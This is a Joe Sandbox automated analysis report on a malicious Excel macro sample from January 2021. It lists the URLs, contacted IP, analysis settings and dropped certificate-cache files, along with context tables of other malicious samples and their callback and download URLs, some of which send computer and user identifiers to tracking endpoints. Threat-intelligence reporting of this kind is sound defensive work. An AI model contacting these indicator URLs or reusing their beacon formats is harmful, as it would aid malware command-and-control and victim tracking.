          http://www.icra.org/vocabulary/.DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.DWWIN.EXE, 00000005.00000002.2239715014.0000000003E10000.00000002.00000001.sdmpfalse
            high
            http://crl.entrust.net/server1.crl0DWWIN.EXE, 00000005.00000003.2231408116.0000000003621000.00000004.00000001.sdmpfalse
              high
              http://ocsp.entrust.net03DWWIN.EXE, 00000005.00000003.2231408116.0000000003621000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://investor.msn.com/DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmpfalse
                high
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0DWWIN.EXE, 00000005.00000003.2231404153.0000000003618000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.%s.comPADWWIN.EXE, 00000005.00000002.2239715014.0000000003E10000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                low
                http://www.diginotar.nl/cps/pkioverheid0DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueDWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oeDWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmpfalse
                  high
                  http://ocsp.entrust.net0DDWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://secure.comodo.com/CPS0DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmpfalse
                    high
                    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2103191822.0000000001D10000.00000002.00000001.sdmp, DWWIN.EXE, 00000005.00000002.2236119170.0000000002340000.00000002.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://crl.entrust.net/2048ca.crl0DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmpfalse
                      high

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      199.59.242.150
                      unknownUnited States
                      395082BODIS-NJUStrue

                      General Information

                      Joe Sandbox Version:31.0.0 Red Diamond
                      Analysis ID:338158
                      Start date:11.01.2021
                      Start time:18:27:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 5m 38s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:sample20210111-01.xlsm
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • GSI enabled (VBA)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal88.expl.evad.winXLSM@7/19@1/1
                      EGA Information:Failed
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .xlsm
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Found warning dialog
                      • Click Ok
                      • Found warning dialog
                      • Click Ok
                      • Found warning dialog
                      • Click Ok
                      • Attach to Office via COM
                      • Close Viewer
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 13.88.21.125, 13.64.90.137, 104.18.10.39, 93.184.221.240
                      • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, wu.azureedge.net, watson.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, wu.wpc.apr-52dd2.edgecastdns.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      18:28:06API Interceptor500x Sleep call for process: DWWIN.EXE modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      199.59.242.150http://undo.itGet hashmaliciousBrowse
                      • undo.it/favicon.ico
                      jsezPXBYSo.exeGet hashmaliciousBrowse
                      • sec.timerz.org/addrecord.php?apikey=ab89_api_key&compuser=computer|user&sid=KKiFporIlJnvi8Sj&phase=4F85366F80624A21|86401|24GB
                      7RR6UWAoLz.exeGet hashmaliciousBrowse
                      • gmn.timerz.org/addrecord.php?apikey=snt2_api_key&compuser=computer|user&sid=yyy3DVSKqMS7CQxS&phase=0896C02011BCDB3F|72920|22GB
                      ToNKWS7M79.exeGet hashmaliciousBrowse
                      • ghb.timerz.org/addrecord.php?apikey=aw46_api_key&compuser=computer|user&sid=y3fPLg7isdS74dQX&phase=20FE743FCD18FAB6|75361|22GB
                      8AkYlqVWsi.exeGet hashmaliciousBrowse
                      • sec.timerz.org/addrecord.php?apikey=ab89_api_key&compuser=computer|user&sid=z0mSMg7UwftUb8zT&phase=56567FFFCCF9B369|86789|24GB
                      http://microsoftexchangeservert8zr2.nut.ccGet hashmaliciousBrowse
                      • free-today.com/favicon.ico
                      10Order.exeGet hashmaliciousBrowse
                      • www.oklahomapayday.loan/hx271/
                      animeonline.netGet hashmaliciousBrowse
                      • animeonline.net/rz?u=http%3A%2F%2Fusa.bravo-dog.com%2Fzcvisitor%2F929a5c76-3212-11e8-91bc-0a8ca3fd4c72%3Fcampaignid%3Df6228670-4b89-11e7-b1d2-0eda985eb958&notadsafe
                      199.59.242.150Get hashmaliciousBrowse
                      • 199.59.242.150/favicon.ico
                      http://galereya-mebel.ru/Question/Get hashmaliciousBrowse
                      • datadrivensolution.com/?kw=ftz&p=2&rndx=1521403861663
                      WgfMD4LKDZ.exeGet hashmaliciousBrowse
                      • awskohg.wecloudapi.com/cl/downloader?version=47.10.2526.80&channel=january&d=0&userid=&sys=6.1
                      http://ufcna.com/glp?r=&u=http%3A%2F%2Fufcna.com%2Fflux-radar-Orly-D-est-05.jpg&rw=1280&rh=1024&ww=784&wh=490Get hashmaliciousBrowse
                      • ufcna.com/glp?r=&u=http://ufcna.com/flux-radar-Orly-D-est-05.jpg&rw=1280&rh=1024&ww=784&wh=490
                      15filee.exeGet hashmaliciousBrowse
                      • www.pennsylvaniaauto.loan/hx187/?9r=2ZpML92nryXLTbqctj2GuhH0VJyGjH5quSw7FLYH454OQrtH6v4Ycy4rEoZBWjtue2zE2QlA621ynJn6JpRd7A==&8pBXn=3f3DUfw&sql=1
                      .exeGet hashmaliciousBrowse
                      • ebookcenter.vvs.ir/dlversion.php?id=Herb%20Blackburn
                      19List.exeGet hashmaliciousBrowse
                      • www.pfwbn.com/dm/?id=XISGJT3EqbPKoaX7rl8KuN74u7B41XTmCz7eDwqqLFsPGp7qlDpp0+n9XSmpMmt+WE59iXFYb8Eb/apyiXADlg==&sql=1
                      FACT-90D93210.docGet hashmaliciousBrowse
                      • caspianlab.com/XRKJO8m
                      FACT-90D93210.docGet hashmaliciousBrowse
                      • caspianlab.com/XRKJO8m
                      FACT-90D93210.docGet hashmaliciousBrowse
                      • caspianlab.com/XRKJO8m
                      36history.550.js.js.jsGet hashmaliciousBrowse
                      • dragqueenwig.com/itukabk

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      cdn.digicertcdn.comINV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                      • 104.18.11.39
                      INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                      • 104.18.10.39
                      INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                      • 104.18.10.39
                      SurfsharkSetup.exeGet hashmaliciousBrowse
                      • 104.18.10.39
                      https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1Get hashmaliciousBrowse
                      • 104.18.10.39
                      ASHLEY NAIDOO CV.docGet hashmaliciousBrowse
                      • 104.18.10.39
                      RFQ.docGet hashmaliciousBrowse
                      • 104.18.10.39
                      SecuriteInfo.com.Trojan.BtcMine.3311.17146.exeGet hashmaliciousBrowse
                      • 104.18.11.39
                      http://test.kunmiskincare.com/index.phpGet hashmaliciousBrowse
                      • 104.18.11.39
                      https://email.utest.com/ls/click?upn=Q3qQnfemZbaKqqMTD32WX0Q-2F38lqT2tAzE5eVnmPd7-2BQtbqdrAGPxGIiQmtbZbEcQfp88ilOu42BqywW-2BHQ-2F36ib8mcb8EYG4w64Icmefi3xXbpzwMP3NQ3974KeR1Cm-2FtwcR7xFilzHs6N8iNLyS48aGcVYmSpzSB5rZFj7iHuxTwLnTumc1AOR4vtcYHqqiqHY7g-2B-2FJ-2Bp2X-2FMfZ-2FQF6-2BtQvwrHR4Do9NZhu9Dvij-2BKa330W7UbuEz2iIv6oZ18C14g_HT-2FwmlBF7R5nW6HayR9wjpSE-2FEYoNhBRZJxfk0aqS7vYxNZiuzaetMNdYjE6WQ7lhnX-2F3CEUYMAVCWb9b2KoxJgG7bbDpZV8jJzJcz-2FHdj603HdwbUFnR5bNfB4iXdW0ho4xmgP3jr4yW0dQVZ-2FVH-2B4BUSDEwiU9rMA5oZN54vSw8okk6D-2FopaYrwFKHesb3rZ-2B-2FXvvZXiTmiwexXLF98nxPgg28hqPBVP8Ce82XUi0-3DGet hashmaliciousBrowse
                      • 104.18.10.39
                      https://email.utest.com/ls/click?upn=eSGWhpVX2YfcJc4oKRJyCitYauf8dzcbVvAmQmQH4oZBbVMlkneKSVGqyJywGhpngTJJbZcqKw2ZrPBb6oQsQjUFyq4tbqbTGCzxR1eG4Z9O9abaPDZxc5NM1HvYjLOzed8zOYLIYcXnFBAxNAMQRlQBs6-2FmRK-2BaDDT2yagiQtTusU0-2FuKBxVVMBtDF3y-2BvaUDK48BxfAjoAvSGh6p8tJcMdNHuC687sMnINVJLdmfU-3D7Y6S_CzF3IAhuvYaPWoKJ87ALtJgaMHByYMlBwvQVuZ3bhcFe4St6cx8KCfN-2B2rcCNvOA-2BeX4QMjQb-2FUgtEcK8j5R6EI1G-2BBWI35h9mDCE7AAF1w3V3wR14L28vyaTqJbw5uQyTI0DJse16q7T2cnyVezsqen7-2F42lXjAhKUL9SqUvgoogoRMVuUrByVc8HvS0sQEQjAPQ8xNbeD4KhQ-2BMcqRFg-3D-3DGet hashmaliciousBrowse
                      • 104.18.11.39
                      https://email.utest.com/ls/click?upn=7pk4n7zyu3C81Mn1P-2FDmbQYiftB7Um69feDieyAcP67WG6G79-2FZJVKAlazUBAbfEF4GoDtXgPjNLWzDCnPh7Xakgzgk-2FmStvhSscVXayLFhZIIFZIYIscDWC3Iu-2BcY3A9omatVYEiWPK2Incpc6HzU578AM2hu6p-2Bn6uq0TcLQpocWZwdV9dCrqsMtrX-2FDi4HBg4XX4-2F3i2UkQ7nuJQrSo1-2FKKJZxdiMIvGfSPtt6AA-3D_Ps1_JjL7p1lgTUYZ5WQny2C5NjuXSDa0fPfjvfUw5EqzhcRvTxd-2F1XX8gbl7GK9SIE-2F651Ar7eNStX9JwifbMd-2Bpf6jPpjrN2U1igLfktYyJIQ-2Bml-2FEPkADqSRw-2Fi6D-2BnALXT-2B-2FvcMCA95hRIW-2FohWo93WXHSr3sm64NMmNmn7vCUVlwAUUBcpBMBuo-2FwDzI6vV-2FqVihNDaxiv67q2KreHoN-2B1iBGj-2FxyhjkJJWZIE1Jjos-3DGet hashmaliciousBrowse
                      • 104.18.11.39
                      https://email.utest.com/ls/click?upn=67aRGAcCFCvHxiPAckWKkhPC4KvHs6b-2F2weO-2F4bbSuzsR0S00yjD-2Bp98nxI8VUxFO-2BA-2FaoV7I7ejt7iWFdzNGQD7Rt-2B-2FrHigS8odmZ5jtBR1Jc-2F-2ByB20l8hXLQVEUsoKYNzQVntp2VlCibfgJJsmyTb3rVDsu9ejaUs6-2FrCmWTartaVeLsn0D92Hp7N17yWd7UqmLdwaGYREjE6axvHGamR7YgBj26o7dhrUoK-2BeTg4-3DlR5U_V3NU-2FA-2F-2BMCS01eqTEl7SwdC4Y1sHc0Ok-2BE-2BBcFuZa-2FMLGwVAklUo5zpn5w-2FWMCIp5-2FtPYdDyjonZQp2-2Fm-2FtoJqNBof8e11z4gErP9ujPflSfLTzXPNoDO4w6SdWItChamjCgpNcPi7T73NCj5Bg6ZnTadUi7N8-2BY2rrmnE5gpze1qYGwtCTwrD-2FEhq3HOVVSI6EgHrfbUqiGU0pY5jHFIJ3IDNrcPLgrZyFiYcyqRek-3DGet hashmaliciousBrowse
                      • 104.18.11.39
                      https://email.utest.com/ls/click?upn=LMh8OQWOikhQ4E8y-2BrYnz-2BbDB2TElaf90yCHoFAn4M1bYurbyYcloHeQnYwY0vQ7VDotXE-2F1AU3v6KKQKAvhhYV0UBWlqtuRNZJVtvX80VxChFCc1lzvSHIOg2vQaiTyT0IDnohwmvAyk6q7Lw7aV2oNzPp1SRnlWHFXN0qSB1ZgfLjV0g7BwyUNgRacGzLQzxxo4OCEX0IynXTekIdGpsnVH8RdeHbQN5hmkvqmAfMoOPsGKIXFuD2XjXmSQNwHQ8tj_OFYFW3aawQjHnZ2oUsm9aGRmiVDxWOGUeXvmswsU9xvx6eL-2F-2Facl5TxDb-2FnQAE-2F9WO-2BX1bZLZ3dQ6WwuATmPzz3S8NpXbPAjepyz5kRHvZa0CDmTSp0IhGs72hXqIXDMOuT72gd5GYA2W6rPcohuTqV3rAs0ui6xQJlDhswQEvrgqzCELYcSf4yeLy0GlPUnnpdaGlBorHCk0eM6B-2FWcFUAXo2t3fTe0C5AFZKARfK8-3DGet hashmaliciousBrowse
                      • 104.18.11.39
                      https://email.utest.com/ls/click?upn=pRtNAE4pBw306smbkBG7VfeIwBX2zq-2BxFGkc-2FYVg2kyteQhPgCyjFlF3g7Xm8OdsEJm4m-2Bb8v32fZo5G1S6IScPtZRx0O1qeslKL30HVUgu03CpTlmUlGG19oYXIdBdB3T-2BnneFUo-2FnuydTFtQrV-2FFD7ECFZ6-2BXjQduZf9kDgVI74LqkaeF5jfEKlvI9dNzmUWbncaLWs9jkPrQYRliwgvYISGRxPJ7a3gAUWZPRjDY-3DfCad_fQ8VNONEToroRqvq8M8IT71VVsbp-2FrVCPzMBywYUGjNEx5hFeS-2B3-2B0wfsC8rR2-2FcrAujDEHG74A-2FnVGsRRFxg-2FNYq0Ficj-2F6MNmWD3eD9hLtWuST0s8y4JgrbMq35uIiVx4-2FWXoquNFvepEkXYb-2BIIifvG1Hrrso0Hz938T8Kk2oqOiB-2BWIt73FfY6-2F7kAdcZlD9fseESOxt2IDwNJfsG-2BJ2dV9l2zjNB8qRR8WVLPs-3DGet hashmaliciousBrowse
                      • 104.18.11.39
                      https://email.utest.com/ls/click?upn=fuaIpvnsuSQILWwzYiXi5qnEApdA08gndIGt9eDXEUzb2D9ZQis83XJjquyQ-2B9NU6N6PUmNiYKL2-2B9K-2B0Q-2FRuNZV2Rm6EE3tP6uveKZcpGa39fA3R6q6mtnf0YazerOr3Wym2I-2B4EKphohsG9TZrR10vb4sAorg3TlmbMLBvyRhlhPfnKFPOumxhPEnjlTpz4URurYF2wvhUTU5FbrZwbgaLDFhKWhDuDmKVQ4MiqOgEAGo1wQlNp439PzN1eKX8UvDM_oB8tJkdbn8-2B0HmsO8J4iQplzftnfE-2B8k0a9q1EntRKkJu1B-2FCVgO526eX33TRFpJwAzeZS5KAS0tKKzRRvWnodl78aEsHhSxo91ApNyL4MdpCkbZLJkdQb12aN6YOUgsp7GPBut2ZGkQb0VPeuTR9sLawADBZxxcvvOm5C44mioeJoHe0qFQpD7j-2FkTjaJgMi4jWdYXYz6hdODOLE13y3HyL2fGbEXG3mHtm20h7Ry8-3DGet hashmaliciousBrowse
                      • 104.18.10.39
                      https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3DGet hashmaliciousBrowse
                      • 104.18.10.39
                      https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3DGet hashmaliciousBrowse
                      • 104.18.10.39
                      Vessel details.docGet hashmaliciousBrowse
                      • 104.18.11.39
                      excel.xlsGet hashmaliciousBrowse
                      • 104.18.11.39

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      BODIS-NJUSIRS Notice Letter pdf document.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      mQFXD5FxGT.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      099898892.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      ZIPEXT#U007e1.EXEGet hashmaliciousBrowse
                      • 199.59.242.153
                      990109.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      SAWR000148651.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      https://www.chronopost.fr/fclV2/authentification.html?numLt=XP091625009FR&profil=DEST&cc=47591&type=MASMail&lang=fr_FRGet hashmaliciousBrowse
                      • 199.59.242.153
                      IRS Notice Letter.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      IRS Notice Letter.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      Payment Order Inv.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      h3dFAROdF3.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      kqwqyoFz1C.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      file.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      PByYRsoSNX.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      3Y690n1UsS.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      Purchase_Order_39563854854.xlsxGet hashmaliciousBrowse
                      • 199.59.242.153
                      SOA121520.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      googlechrome_3843.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      cap.exeGet hashmaliciousBrowse
                      • 199.59.242.153

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):914
                      Entropy (8bit):7.367371959019618
                      Encrypted:false
                      SSDEEP:24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
                      MD5:E4A68AC854AC5242460AFD72481B2A44
                      SHA1:DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
                      SHA-256:CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
                      SHA-512:5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: 0...0..v........:......(d.....0...*.H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0...*.H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90...*.H.............`g(.o.Hc.1..g..}<.J...+.._sw*2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G*=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq..*.O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.
                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                      Category:dropped
                      Size (bytes):58936
                      Entropy (8bit):7.994797855729196
                      Encrypted:true
                      SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                      MD5:E4F1E21910443409E81E5B55DC8DE774
                      SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                      SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                      SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):252
                      Entropy (8bit):3.0862995200743666
                      Encrypted:false
                      SSDEEP:6:kKd/zLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:RLutWOxSW0zeYrsMlU/
                      MD5:0FCAC07AEFF591E1FF36221FC15993B5
                      SHA1:6AF4105DB3149F0580D3E8347CE34161EB9D1263
                      SHA-256:866EEAAF51EA184F5C6F6C26755C5F44D98B78AC37FE334267E6C41EEEBDFA1A
                      SHA-512:A4AB264BF66FC9F69430B213CBF09BDD919777E0DEC8820AA77F06AF8D3A60645C8B9C39355176C97B7B8FDCFCD40F6F28C27599B31B59533925FC1D8E1F2970
                      Malicious:false
                      Reputation:low
                      Preview: p...... ....j.... ....(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...
                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):326
                      Entropy (8bit):3.117051994467751
                      Encrypted:false
                      SSDEEP:6:kKvVwswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:nVykPlE99SNxAhUegeT2
                      MD5:4FA401A194E5284B0318ED59396335C5
                      SHA1:82F0AEA431C0AC660303423D44DEC0F299C8D1E4
                      SHA-256:6942E5AA884492FA35293A7A7811E1228C463F90A67A883F83AB9FA64B2D07F8
                      SHA-512:D536E1FEDB6B5392CAD3B8341B10A2B875D6945C499BA76F09486461FD7D6037BCF0CE2B74A392F92B6458AEA041914D4DA52C6DE0A07340C67EEA415EA4A97F
                      Malicious:false
                      Reputation:low
                      Preview: p...... .........'1.....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B9858B0.emf
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                      Category:dropped
                      Size (bytes):1408
                      Entropy (8bit):2.270567557934206
                      Encrypted:false
                      SSDEEP:12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
